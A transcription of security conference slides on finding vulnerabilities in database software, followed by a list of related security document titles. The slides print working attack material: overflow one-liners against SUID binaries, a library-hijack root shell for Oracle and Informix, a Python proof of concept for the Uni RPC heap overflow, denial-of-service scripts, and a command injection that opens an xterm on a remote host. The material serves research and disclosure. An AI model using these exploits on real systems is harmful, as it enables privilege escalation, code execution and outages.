Database's Security Paradise. Joxean Koret
|
|
|
- Jeremy Malone
- 10 years ago
- Views:
Transcription
1 Database's Security Paradise Joxean Koret
2 Security in Databases Many people still believe databases are hard to audit/hack. Name it as you prefer... Many people consider database software as too big products to find vulnerabilities in a small amount of time. But, is this true? Well...
3 Focus of the talk The focus of the talk is the following: Show vulnerabilities Both 0days, +1day and fixed. Show how to find them Evaluate with this data how complex vulnerability discovery is in database software
4 Baby Steps in Vuln. Discovery What are the first steps in vulnerability discovery? Download & install the product. Read documentation and understand the architecture. Look for local bugs (process privileges, pipes, suid binaries, bad permissions, etc...). Unauthenticated remote bugs (denial of services, remote code execution, etc...). Typically using fuzzing while you learn how it works. Remote authenticated bugs. If you want, using fuzzing, for example.
5 Stupid vulnerabilities Let's start with UniData (now, Rocket U2) Adquired by IBM DB2 and sold to Rocket Software after a long while Steps: Download the software and install it (Linux version). Check installation directory for suid binaries Found udt_signal SUID root binary Open IDA and analyze it The 1 st very stupid vulnerability appears within seconds
6 Send SIGUSR2 signal to any process
7 Unidata's SIGUSR2 bug Any local user can send SIGUSR2 signal to any process, even to root owned ones. Default behavior for signal SIGUSR2 is to exit if signal is not handled. So you can kill many processes in the machine: For example, any remote connection via SSH or Telnet. Time to find the 1 st flaw? How long it took to download and install the package?
8 Bugs from the past: Ingres Time for 'the' ancient database Ingres Developed by Ingres Corporation in the early '70s. All their bugs seems to be from '70s too... Same steps: Download & install the product Check installation directory for suid binaries Many SUID ingres programs found Prior to open them in IDA perform some basic checks...and cry.
9 Welcome to '70s!
10 verifydb multiple stack overflows Long username: $ verifydb -ModeREPORT -ScopeDBNAME -u`perl -e 'print "a"x288;'`bbbb Stack overflow with a long username. Long database name: $ verifydb -mreport -sdbname `perl -e 'print "ABCD"x128;'` -odbms_catalogs Stack overflow with a long database name. So... any local user can execute code as 'ingres' user and do anything with the database.
11 wakeup stack overflow Long II_ADMIN environment variable: $ II_ADMIN=`perl -e 'print a x500;'` wakeup Another old fashioned stack overflow. But, it isn't the end of the fun Almost every ingres suid binary is affected by another local vulnerability...
12 II_INSTALLATION environment variable According to Ingres documentation: II_INSTALLATION: a two-character code, identifying the installation. Simple test: $ II_INSTALLATION=AAAA... <any-ingres-suid> Did I said stack overflow? To the Ingres guys: if it's only a two-character code, verify it's only 2 characters long or cut it to only 2 characters.
13 Ingres Developers...
14 MySQL: Client Tools Time for MySQL The most popular open source database software In this case, we have the source code So we don't even need to download the software We can download the source code or read it online Unfortunately, I have no remote 0day for it :( But the client tools seems to be written for learning how to search vulnerabilities...
15 MySQL Client Tools How many stupid bugs can you find in mysql.cc? I can show you at least 3: EDITOR and VISUAL environment variable stack overflow PAGER environment variable stack overflow Client Server's Banner Heap Overflow It doesn't take longer than 10 minutes Let's see those bugs...
16 Stupid bug #1
17 Stupid bug #2
18 Stupid bug #2
19 Stupid bug #3
20 MySQL Client Tools Bugs The bugs #1 and #2 aren't interesting Are exploitables but completely uninteresting. The bug #3, however, is remotely exploitable Some ideas: Put a fake MySQL server in a network and wait for somebody to connect with mysql's tool. Put it in the internet 0:-) After owning a MySQL database server, it can be used to own other boxes (backup servers, for example).
21 IBM DB2 Time for IBM DB2 database Very big database server used by many corporations and governments worldwide. Similar steps as with Ingres: Download & install the product (win32). A big file (~900MB) Open Process Explorer (SysInternals tools) and check local IBM DB2's processes 1 st bug found
22 Local privilege escalation
23 IBM2 DB2 Escalation of Privileges The process db2dasstm.exe is spawned by db2dassrm.exe using CreateProcessAsUser. Developers specified a null access control list for the process. SetSecurityDescriptorDacl with a null pdacl. According to Microsoft documentation...
24 IBM2 DB2 Escalation of Privileges SetSecurtyDescriptorDacl function pdacl A pointer to an ACL structure that specifies the DACL for the security descriptor. If this parameter is NULL, a NULL DACL is assigned to the security descriptor, which allows all access to the object. The DACL is referenced by, not copied into, the security descriptor.
25 IBM DB2 Escalation of Privileges As a result of this bug: Any local user can escalate privileges to LOCAL SYSTEM Any local user can own the complete database Any local user can install a rootkit (database or OS level) Do anything (s)he wants. And, oh! BTW, it isn't the unique IBM DB2 process affected by this flaw: Any remote/local connection to the database spawns a new process the same way.
26 IBM DB2 Escation of Privileges This bug is well known but still unfixed AFAIK Maybe because I did not reported it... The bug appeared first in blog.48bits.com I wrote about it in 2008
27 Oracle Database Server Next database server, Oracle: Among with IBM DB2, the most used database server worldwide by governments and corporations. Similar steps: Download & install the package (Linux version). Check installation directory for SUID binaries 'extjob' suid root binary appears Fixed vulnerability, CVE Reported by me in 2008, and by others... in 2004! Only 4 years!
28 CVE Binary $ORACLE_HOME/bin/extjob is SUID root. However, 'extjob' uses shared objects (.so) owned by the oracle group (typically 'dba' or 'oinstall'). For example, libclntsh.so Any user from this group can change this library to escalate privileges from 'oinstall' to root. As the prior vulns., usefull for multi-stage attacks. It takes seconds to discover this vulnerability Using 'ls' and 'ldd' tools is enough.
29 $ cat test.c CVE Example void attribute ((constructor)) my_init(void) { printf("[+] It works! Root shell...\n"); system("/bin/sh"); } $ cc test.c -fpic -o test.so -shared $ mv $ORACLE_HOME/lib/libclntsh.so.10.2 /tmp $ mv test.so $ORACLE_HOME/lib/libclntsh.so.10.2 $ $ORACLE_HOME/bin/extjob [+] It works! Root shell... sh-3.1#
30 Informix Dynamic Server Next product, Informix Dynamic Server Owned by IBM. Good database used by many banks, big corps. and some governments. Steps: Download & install (Linux version) Check installation directory Many SUID root binaries appears Cannot find a vulnerability with simple tests (like the ones performed with Ingres or Oracle) Let's open IDA and analyze some of them In our example, onedcu suid root binary.
31 onedcu informix to root EoP No linked.so owned by informix user found via 'ldd'. Every Informix's suid root binary shares the same code to verify certain environment variables: INFORMIXDIR, SQLHOSTS, ONCONFIG. No vulnerability discovered checking the most common environment variables But found one 'curious' function: ifmx_dlopen
32 Function ifmx_dlopen Obvious purpose:
33 Path to ifmx_dlopen function
34 Path to gl_init_glu gl_init_glu is called from initgls. Initgls is called from main. Let's check initgls function...
35 Initgls function If the environment variable GL_USEGLU is set the 'onedcu' loads one, unfortunately fixed path (non influenciable),.so library.
36 onedcu suid root EoP Using the same library as in the Oracle case this time we need to overwrite: $INFORMIXDIR/gls/dll/32-libicudata.so.42 $ export INFORMIXDIR=/opt/IBM/informix $ export GL_USEGLU=1 $ $INFORMIXDIR/bin/onedcu [+] It works! Root shell... sh-3.1#
37 Informix EoP It was harder to find a vulnerability than in the other cases but not very hard... It took me some hours to find the EoP Well, it took me some hours to find the function ifmx_dlopen... After that, the EoP was very obvious. While this vulnerability cannot be abused (AFAIK) by any local users it can be usefull for multi-stage attacks using other vulnerabilities... A fake INFORMIXDIR cannot be used as it must be owned by INFORMIX user.
38 Remote Bugs Time to find remote bugs I will show both 0days and fixed vulnerabilities Will it be very hard to find at least one? Let's see...
39 Rocket U2 Uni RPC Service Remote Code Execution Vulnerability Rocket U2 was UniVerse/UniData Remote pre-authenticated vulnerability Only one shoot needed to own it Vulnerability discovered by Rubén Santamarta ZDI
40 ZDI Extracted from the ZDI's advisory: The specific flaw exists in the Uni RPC service (unirpcd.exe) which listens by default on TCP port The unirpc32.dll module implements an RPC protocol and is used by the Uni RPC service. While parsing a size value from an RPC packet header, an integer can overflow and consequently bypass a signed comparison. This controlled value is then used as the number of bytes to receive into a static heap buffer. By providing a specially crafted request, this heap buffer can overflow leading to arbitrary code execution under the context of the SYSTEM user.
41 ZDI POC for the vulnerability: s = socket.socket(socket.af_inet,socket.sock_stream) s.connect((sys.argv[1], 31438)) s.send("\x6c\x02\x6f\x6c" # Magic +"\x7f\xff\xff\xf0" # our_size +"\x18\x19\x0a\x0b" +"\x02\x0d\x0e\x0f" +"\x00\x00\x00\x00" # check 1 +"A"*0 20 +whatever # Shellcode...
42 ZDI This vulnerability could be found in minutes with fuzzing. Rubén found it, within minutes, using his brain and a debugger. An easy one... that took about 3 years to fix.
43 IBM DB2 How hard can it be to find a remote vulnerability in IBM DB2? Not so hard to find a remote DOS. But post-authenticated. Let's see a simple vulnerability A remote DOS calling a stored procedure with a space character in the schema name. Yep, that easy.
44 IBM DB2 Remote DOS import DB2 def main(): global connection connect() cur = connection.cursor() cur.callproc("sysproc.hasnicknamechanged", ('TEST', None, None, None, None, None))
45 IBM DB2 Remote DOS Found by mistake while writting a fuzzer... Notice the space betwen the schema name and the procedure to be called. How the hell did IBM missed this so easy to find bug???? Non-exploitable, unfortunately. But a remote DOS anyway.
46 IBM DB2 'repeat' Heap Overflow Vulnerability found by Evgeny Legerov Fixed, CVE Remote code execution seems possible A simple proof-of-concept (SQL command): SELECT REPEAT(REPEAT('1',1000), ) FROM SYSIBM.SYSDUMMY1; IBM doesn't use fuzzing, obviously: Otherwise, this vulnerability could be detected very easily...
47 IBM DB2 Notes It seems to be relatively easy to find a vulnerability. IMHO, they didn't fuzzed anything in the database software... Stored procedures, DRDA protocol, etc...
48 Informix Dynamic Server Remote (post-authenticated) vulnerabilities: 'sq_sgkprepare' remote denial of service. 'start_onpload' procedure remote code execution Found by David Litchfield in A resurrected bug.
49 Informix Remote DOS POC import socket from libinformix import Informix ifx = Informix() ifx.username = "test" ifx.password = "test" ifx.databasename = "testdb" s = socket.socket(socket.af_inet, socket.sock_stream) s.connect((host, 9088)) s.send(ifx.getpacket()) data = s.recv(4096) buf = '\x00\x86\x00\x00\x00\x17select * from systables\x00\x00\x16\x001\x00\x0c' s.send(buf) # Die
50 Informix Remote DOS Reversed the Informix communication protocol and wrote a library in Python. Available in Inguma since It makes login and, after it, sends the command 0x86 to the server. The command 0x86 is 'sgkprepare'. See the function's table jmpsql in binary oninit. If no cursor was previously prepared the function fails with a null pointer dereference.
51 Informix start_onpload RCE Vulnerability found by David Litchfield CVE Code execution is 100% reliable as it's a simple command injection Vulnerability resurrected in latest versions...
52
53 Informix start_onpload RCE Extracted from the original advisory: The user supplied "args" is concatenated to "cmd /c %INFORMIXDIR%\bin\onpload " on Windows and '/usr/informix/bin/onpload' on Unix systems. An attacker with only "connect" permissions can exploit this to run arbitrary OS commands. Example exploit: CALL informix.start_onpload('; /usr/bin/xterm -display host:0')
54 Informix Notes With the resurrected bug we can reach code execution from a user with only connect privileges. Using the EoP we can escalate from a database user with only connect privileges to root. Kewl!
55 Conclussions Database server software is typically very big and the code base is old There must be a lot of vulnerabilities There must be a lot of old code not touched in years With the vulnerabilities shown in this talk we can conclude that Nowadays, it's relatively easy to find vulnerabilities in database software But many of them can be easily fixed, also
56
Custom Penetration Testing
Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools
Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com
Format string exploitation on windows Using Immunity Debugger / Python By Abysssec Inc WwW.Abysssec.Com For real beneficiary this post you should have few assembly knowledge and you should know about classic
Turning your managed Anti-Virus
Turning your managed Anti-Virus into my Botnet Jérôme NOKIN http://funoverip.net About me # id Jérôme Nokin http://funoverip.net [email protected] # job Penetration Tester Verizon Enterprise Solutions
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Mac OS X Snow Leopard: IBM Informix IDS 11.5 + PHP 5.3
Mac OS X Snow Leopard: IBM Informix IDS 11.5 + PHP 5.3 1.1 Introduction Since IBM has extended support for Informix Dynamic Server (IDS) also Mac OS X by defining a winning combination of the two, IBM
ASL IT SECURITY XTREME XPLOIT DEVELOPMENT
ASL IT SECURITY XTREME XPLOIT DEVELOPMENT V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: The most dangerous threat is the one which do not have a CVE. Until now developing reliable exploits
Programming Flaws and How to Fix Them
19 ö Programming Flaws and How to Fix Them MICHAEL HOWARD DAVID LEBLANC JOHN VIEGA McGraw-Hill /Osborne New York Chicago San Francisco Lisbon London Madrid Mexico City- Milan New Delhi San Juan Seoul Singapore
Bug hunting. Vulnerability finding methods in Windows 32 environments compared. FX of Phenoelit
Bug hunting Vulnerability finding methods in Windows 32 environments compared FX of Phenoelit The goal: 0day What we are looking for: Handles network side input Runs on a remote system Is complex enough
ERNW Newsletter 51 / September 2015
ERNW Newsletter 51 / September 2015 Playing With Fire: Attacking the FireEye MPS Date: 9/10/2015 Classification: Author(s): Public Felix Wilhelm TABLE OF CONTENT 1 MALWARE PROTECTION SYSTEM... 4 2 GAINING
Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>
Unix Security Technologies Pete Markowsky What is this about? The goal of this CPU/SWS are: Introduce you to classic vulnerabilities Get you to understand security advisories Make
1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained
home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Nessus scanning on Windows Domain
Nessus scanning on Windows Domain A little inside information and Nessus can go a long way By Sunil Vakharia [email protected] Version 1.0 4 November 2003 About this paper This paper is not a tutorial
Learn Ethical Hacking, Become a Pentester
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
Vulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
IOActive Security Advisory
IOActive Security Advisory Title Severity Discovered by CVE Lenovo s System Update Uses a Predictable Security Token High Michael Milvich [email protected] Sofiane Talmat [email protected]
MatriXay Database Vulnerability Scanner V3.0
MatriXay Database Vulnerability Scanner V3.0 (DAS- DBScan) - - - The best database security assessment tool 1. Overview MatriXay Database Vulnerability Scanner (DAS- DBScan) is a professional tool with
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
The Advantages of Block-Based Protocol Analysis for Security Testing
The Advantages of Block-Based Protocol Analysis for Security Testing Dave Aitel Immunity,Inc. 111 E. 7 th St. Suite 64, NY NY 10009, USA [email protected] February, 4 2002 Abstract. This paper describes
Secrets of Vulnerability Scanning: Nessus, Nmap and More. Ron Bowes - Researcher, Tenable Network Security
Secrets of Vulnerability Scanning: Nessus, Nmap and More Ron Bowes - Researcher, Tenable Network Security 1 About me Ron Bowes (@iagox86) My affiliations (note: I m here to educate, not sell) 2 SkullSpace
Securing your Virtual Datacenter. Part 1: Preventing, Mitigating Privilege Escalation
Securing your Virtual Datacenter Part 1: Preventing, Mitigating Privilege Escalation Before We Start... Today's discussion is by no means an exhaustive discussion of the security implications of virtualization
Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP
Threat Modeling Categorizing the nature and severity of system vulnerabilities John B. Dickson, CISSP What is Threat Modeling? Structured approach to identifying, quantifying, and addressing threats. Threat
Testing for Security
Testing for Security Kenneth Ingham September 29, 2009 1 Course overview The threat that security breaches present to your products and ultimately your customer base can be significant. This course is
Laptop Backup - Administrator Guide (Windows)
Laptop Backup - Administrator Guide (Windows) Page 1 of 86 Page 2 of 86 Laptop Backup - Administrator Guide (Windows) TABLE OF CONTENTS OVERVIEW PREPARE COMMCELL SETUP FIREWALL USING PROXY SETUP FIREWALL
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
Web Application Security Payloads. Andrés Riancho Director of Web Security OWASP AppSec USA 2011 - Minneapolis
Web Application Security Payloads Andrés Riancho Director of Web Security OWASP AppSec USA 2011 - Minneapolis Topics Short w3af introduction Automating Web application exploitation The problem and how
Installing IBM Websphere Application Server 7 and 8 on OS4 Enterprise Linux
Installing IBM Websphere Application Server 7 and 8 on OS4 Enterprise Linux By the OS4 Documentation Team Prepared by Roberto J Dohnert Copyright 2013, PC/OpenSystems LLC This whitepaper describes how
Software security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security
Software security Buffer overflow attacks SQL injections Lecture 11 EIT060 Computer Security Buffer overflow attacks Buffer overrun is another common term Definition A condition at an interface under which
Product Documentation. Preliminary Evaluation of the OpenSSL Security Advisory (0.9.8 and 1.0.1)
Product Documentation Preliminary Evaluation of the OpenSSL Security Advisory (0.9.8 and 1.0.1) Contents Contents Copyright... 3 Preliminary Evaluation of the OpenSSL Security Advisory (0.9.8 and 1.0.1)...
MCAFEE FOUNDSTONE FSL UPDATE
MCAFEE FOUNDSTONE FSL UPDATE 2013-FEB-25 To better protect your environment McAfee has created this FSL check update for the Foundstone Product Suite. The following is a detailed summary of the new and
Bypassing Memory Protections: The Future of Exploitation
Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov [email protected] About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript
Oracle Database Security. Nathan Aaron ICTN 4040 Spring 2006
Oracle Database Security Nathan Aaron ICTN 4040 Spring 2006 Introduction It is important to understand the concepts of a database before one can grasp database security. A generic database definition is
Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!
Sample Penetration Testing Report Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$%&'#)*)&'+,-./0.-121.030045.5675895.467:;83-/;0383; th, yyyy A&0#0+4*M:+:#&*#0%+C:,#0+4N:
6WRUP:DWFK. Policies for Dedicated SQL Servers Group
OKENA 71 Second Ave., 3 rd Floor Waltham, MA 02451 Phone 781 209 3200 Fax 781 209 3199 6WRUP:DWFK Policies for Dedicated SQL Servers Group The sample policies shipped with StormWatch address both application-specific
Virtualization System Security
Virtualization System Security Bryan Williams, IBM X-Force Advanced Research Tom Cross, Manager, IBM X-Force Security Strategy 2009 IBM Corporation Overview Vulnerability disclosure analysis Vulnerability
Database Auditing: Best Practices. Rob Barnes, CISA Director of Security, Risk and Compliance Operations [email protected]
Database Auditing: Best Practices Rob Barnes, CISA Director of Security, Risk and Compliance Operations [email protected] Verizon 2009 Data Breach Investigations Report: 285 million records were compromised
Different ways to guess Oracle database SID
30 October 2008 Different ways to guess Oracle database SID Digitаl Security Research Group (DSecRG) Alexander Polyakov [email protected] http://dsecrg.ru Content Introduction...3 A brief info about SID
Database Security Guide
Institutional and Sector Modernisation Facility ICT Standards Database Security Guide Document number: ISMF-ICT/3.03 - ICT Security/MISP/SD/DBSec Version: 1.10 Project Funded by the European Union 1 Document
DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES
DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES By Michael Crouse Dr. Errin W. Fulp, Ph.D., Advisor Abstract The increasingly high volume of users on the web and their use of web
Click Studios. Passwordstate. Password Discovery, Reset and Validation. Requirements
Passwordstate Password Discovery, Reset and Validation Requirements This document and the information controlled therein is the property of Click Studios. It must not be reproduced in whole/part, or otherwise
From SQL Injection to MIPS Overflows
From SQL Injection to MIPS Overflows Rooting SOHO Routers Zachary Cutlip Black Hat USA 2012 Acknowledgements Tactical Network Solutions Craig Heffner What I m going to talk about Novel uses of SQL injection
File Transfer Examples. Running commands on other computers and transferring files between computers
Running commands on other computers and transferring files between computers 1 1 Remote Login Login to remote computer and run programs on that computer Once logged in to remote computer, everything you
Source Code Review Using Static Analysis Tools
Source Code Review Using Static Analysis Tools July-August 05 Author: Stavros Moiras Supervisor(s): Stefan Lüders Aimilios Tsouvelekakis CERN openlab Summer Student Report 05 Abstract Many teams at CERN,
Linux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details
Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription
Security and Control Issues within Relational Databases
Security and Control Issues within Relational Databases David C. Ogbolumani, CISA, CISSP, CIA, CISM Practice Manager Information Security Preview of Key Points The Database Environment Top Database Threats
Defense in Depth: Protecting Against Zero-Day Attacks
Defense in Depth: Protecting Against Zero-Day Attacks Chris McNab FIRST 16, Budapest 2004 Agenda Exploits through the ages Discussion of stack and heap overflows Common attack behavior Defense in depth
EECS 354 Network Security. Introduction
EECS 354 Network Security Introduction Why Learn To Hack Understanding how to break into computer systems allows you to better defend them Learn how to think like an attacker Defense then becomes second-nature
Chapter 11 Phase 5: Covering Tracks and Hiding
Chapter 11 Phase 5: Covering Tracks and Hiding Attrition Web Site Contains an archive of Web vandalism attacks http://www.attrition.org/mirror/attrition Most attackers, however, wish to keep low profile
SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.
system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped
CS 640 Introduction to Computer Networks. Network security (continued) Key Distribution a first step. Lecture24
Introduction to Computer Networks Lecture24 Network security (continued) Key distribution Secure Shell Overview Authentication Practical issues Firewalls Denial of Service Attacks Definition Examples Key
Hack Your SQL Server Database Before the Hackers Do
Note: This article was edited in Oct. 2013, from numerous Web Sources. TJS At the Install: The default install for SQL server makes it is as secure as it will ever be. DBAs and developers will eventually
Computer Security: Principles and Practice
Computer Security: Principles and Practice Chapter 24 Windows and Windows Vista Security First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Windows and Windows Vista Security
Hardened Hosting. Quintin Russ. OWASP New Zealand Chapter 2011 6th December 2011
Hardened Hosting Quintin Russ OWASP New Zealand Chapter 2011 6th December 2011 1 About Me Quintin Russ Technical Director, SiteHost http://www.sitehost.co.nz [email protected] Web Developer in previous
Using Nessus In Web Application Vulnerability Assessments
Using Nessus In Web Application Vulnerability Assessments Paul Asadoorian Product Evangelist Tenable Network Security [email protected] About Tenable Nessus vulnerability scanner, ProfessionalFeed
PuttyRider. With great power comes great responsibility. # Pivoting from Windows to Linux in a penetration test. Adrian Furtunã, PhD adif2k8@gmail.
PuttyRider # Pivoting from Windows to Linux in a penetration test With great power comes great responsibility Adrian Furtunã, PhD [email protected] root@bt:~# Agenda # Idea origin and usage scenario #
Department of Veterans Affairs VistA Integration Adapter Release 1.0.5.0 Enhancement Manual
Department of Veterans Affairs VistA Integration Adapter Release 1.0.5.0 Enhancement Manual Version 1.1 September 2014 Revision History Date Version Description Author 09/28/2014 1.0 Updates associated
PROFESSIONAL. Node.js BUILDING JAVASCRIPT-BASED SCALABLE SOFTWARE. Pedro Teixeira WILEY. John Wiley & Sons, Inc.
PROFESSIONAL Node.js BUILDING JAVASCRIPT-BASED SCALABLE SOFTWARE Pedro Teixeira WILEY John Wiley & Sons, Inc. INTRODUCTION xxvii CHAPTER 1: INSTALLING NODE 3 Installing Node on Windows 4 Installing on
Top 10 Database. Misconfigurations. [email protected]
Top 10 Database Vulnerabilities and Misconfigurations Mark Trinidad [email protected] Some Newsworthy Breaches From 2011 2 In 2012.. Hackers carry 2011 momentum in 2012 Data theft, hacktivism, espionage
Smartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
Running a Default Vulnerability Scan SAINTcorporation.com
SAINT Running a Default Vulnerability Scan A Step-by-Step Guide www.saintcorporation.com Examine. Expose. Exploit. Install SAINT Welcome to SAINT! Congratulations on a smart choice by selecting SAINT s
Pre-authentication XXE vulnerability in the Services Drupal module
Pre-authentication XXE vulnerability in the Services Drupal module Security advisory 24/04/2015 Renaud Dubourguais www.synacktiv.com 14 rue Mademoiselle 75015 Paris 1. Vulnerability description 1.1. The
AWS Schema Conversion Tool. User Guide Version 1.0
AWS Schema Conversion Tool User Guide AWS Schema Conversion Tool: User Guide Copyright 2016 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may
CSE331: Introduction to Networks and Security. Lecture 15 Fall 2006
CSE331: Introduction to Networks and Security Lecture 15 Fall 2006 Worm Research Sources "Inside the Slammer Worm" Moore, Paxson, Savage, Shannon, Staniford, and Weaver "How to 0wn the Internet in Your
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
Lotus Domino Security
An X-Force White Paper Lotus Domino Security December 2002 6303 Barfield Road Atlanta, GA 30328 Tel: 404.236.2600 Fax: 404.236.2626 Introduction Lotus Domino is an Application server that provides groupware
The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
Penetration Testing Lessons Learned. Security Research
1 Penetration Testing Lessons Learned Security Research 2 Who am I? CTO at Immunity, Inc. Privately held information security company Consulting Training Specialized Security Products CANVAS SILICA Based
Advantages of Server-side Database Auditing. By SoftTree Technologies, Inc.
Advantages of Server-side Database Auditing By SoftTree Technologies, Inc. Table of Contents Advantages of server-side auditing... 3 Does server-side auditing create a performance hit on the audited databases?...
Will Dormann: Sure. Fuzz testing is a way of testing an application in a way that you want to actually break the program.
The Power of Fuzz Testing to Reduce Security Vulnerabilities Transcript Part 1: Why Fuzz Testing? Julia Allen: Welcome to CERT's podcast series: Security for Business Leaders. The CERT program is part
noway.toonux.com 09 January 2014
noway.toonux.com p3.7 10 noway.toonux.com 88.190.52.71 Debian Linux 0 CRITICAL 0 HIGH 5 MEDIUM 2 LOW Running Services Service Service Name Risk General Linux Kernel Medium 22/TCP OpenSSH 5.5p1 Debian 6+squeeze4
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
McAfee Vulnerability Manager 7.0.2
McAfee Vulnerability Manager 7.0.2 The McAfee Vulnerability Manager 7.0.2 quarterly release adds features to the product without having to wait for the next major release. This technical note contains
Defeating Firewalls : Sneaking Into Office Computers From Home
1 of 6 Defeating Firewalls : Sneaking Into Office Computers From Home Manu Garg Overview Yes, it's possible. Let me first give you an overview of the setup. You work with a company
Oracle Security on Windows
Introduction - commercial slide. UKOUG Windows SIG, September 25 th 2007 Oracle Security on Windows By Pete Finnigan Written Friday, 07 September 2007 Founded February 2003 CEO Pete Finnigan Clients UK,
Learning about Informix and the Open Admin Tool (OAT)
Learning about Informix and the Open Admin Tool (OAT) With Tom Beebe Webcast on Feb 11, 2014 Starts at 2pm (EST) What is it? OAT Open Admin Tool Open source, PHP based Free Allows you to monitor and manage
Web Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
Manipulating Microsoft SQL Server Using SQL Injection
Manipulating Microsoft SQL Server Using SQL Injection Author: Cesar Cerrudo ([email protected]) APPLICATION SECURITY, INC. WEB: E-MAIL: [email protected] TEL: 1-866-9APPSEC 1-212-947-8787 INTRODUCTION
IBM WebSphere Application Server Version 7.0
IBM WebSphere Application Server Version 7.0 Centralized Installation Manager for IBM WebSphere Application Server Network Deployment Version 7.0 Note: Before using this information, be sure to read the
Setting Up Specify to use a Shared Workstation as a Database Server
Specify Software Project www.specifysoftware.org Setting Up Specify to use a Shared Workstation as a Database Server This installation documentation is intended for workstations that include an installation
SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING. Presented by: Dave Kennedy Eric Smith
SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING Presented by: Dave Kennedy Eric Smith AGENDA Penetration Testing by the masses Review of current state by most service providers Deficiencies in
How Strong Is Your Fu? http://www.painsec.com/
. How Strong Is Your Fu? http://www.painsec.com/ Contents 1 Phase 1: The noob filter 3 2 Phase 2: Serious Business 5 2.1 killthen00b challenge...................................... 5 2.2 ghost Challenge........................................
Oracle post exploitation techniques. László Tóth [email protected]
Oracle post exploitation techniques László Tóth [email protected] Disclaimer The views expressed in this presentation are my own and not necessarily the views of my current, past or future employers. Content
Oracle Security Auditing
Introduction - Commercial Slide. RISK 2008, Oslo, Norway, April 23 rd 2008 Oracle Security Auditing By Pete Finnigan Written Friday, 25th January 2008 Founded February 2003 CEO Pete Finnigan Clients UK,
Oracle Security Auditing
RISK 2008, Oslo, Norway, April 23 rd 2008 Oracle Security Auditing By Pete Finnigan Written Friday, 25th January 2008 1 Introduction - Commercial Slide. Founded February 2003 CEO Pete Finnigan Clients
Using Palo Alto Networks to Protect Microsoft SharePoint Deployments
